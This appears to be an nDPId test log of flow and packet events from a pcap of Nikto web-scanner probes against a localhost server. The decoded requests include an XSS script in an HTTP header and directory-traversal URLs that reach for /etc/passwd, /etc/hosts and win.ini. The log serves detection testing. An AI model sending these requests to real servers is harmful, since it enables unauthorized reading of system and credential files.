00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420276837,"pkt":"AAAAAAAAAAAAAAAACABFAADlgjNAAEAGud1\/AAABfwAAAcJoH5AFkroJ2Lkky4AYAED+2QAAAQEICp1m+42dZvuNR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KRXhwZWN0OiA8c2NyaXB0PmFsZXJ0KHhzcyk8L3NjcmlwdD4NClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGVfZXhwZWN0X3hzcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1576420276839,"pkt":"AAAAAAAAAAAAAAAACABFAAEW4vNAAEAGWOx\/AAABfwAAAcJqH5CF6NrJzvbnOoAYAED\/CgAAAQEICp1m+4+dZvuOR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvYm9vdC5pbmklMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRpcmVjdG9yeSB0cmF2ZXJzYWwgY2hlY2spDQoNCg=="}
01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1576420276840,"pkt":"AAAAAAAAAAAAAAAACABFAAEXDe5AAEAGLfF\/AAABfwAAAcJsH5C64jXXMX558oAYAED\/CwAAAQEICp1m+5CdZvuQR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL2hvc3RzJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00798{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1576420276841,"pkt":"AAAAAAAAAAAAAAAACABFAAEi9VxAAEAGRnd\/AAABfwAAAcJuH5BHUs1h0rvodIAYAED\/FgAAAQEICp1m+5GdZvuRR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvSEFTSCgweDU1NTllODRmYmM0MCklMDAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":297,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":297,"pkt_l4_len":263,"thread_ts_msec":1576420276842,"pkt":"AAAAAAAAAAAAAAAACABFAAEbV1RAAEAG5IZ\/AAABfwAAAcJwH5AGYW9pnm57IYAYAED\/DwAAAQEICp1m+5KdZvuSR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2lubnQvd2luLmluaSUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1576420276844,"pkt":"AAAAAAAAAAAAAAAACABFAAEdYctAAEAG2g1\/AAABfwAAAcJyH5D8wFnzKu6RnoAYAED\/EQAAAQEICp1m+5SdZvuUR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2luZG93cy93aW4uaW5pJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KDQo="}
01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1576420276847,"pkt":"AAAAAAAAAAAAAAAACABFAAEYOOhAAEAGAvZ\/AAABfwAAAcJ0H5DjgwDevH40fYAYAED\/DAAAAQEICp1m+5adZvuWR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL3Bhc3N3ZCUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCg0K"}
01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276856,"pkt":"AAAAAAAAAAAAAAAACABFAADBvW9AAEAGfsV\/AAABfwAAAcJ2H5DTj4VUAEbtioAYAED+tQAAAQEICp1m+6CdZvugR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276858,"pkt":"AAAAAAAAAAAAAAAACABFAADB2xVAAEAGYR9\/AAABfwAAAcJ4H5D77OMujr7QhoAYAED+tQAAAQEICp1m+6KdZvuiR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276859,"pkt":"AAAAAAAAAAAAAAAACABFAADApHlAAEAGl7x\/AAABfwAAAcJ6H5CcwpxJV58CXYAYAED+tAAAAQEICp1m+6OdZvujR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
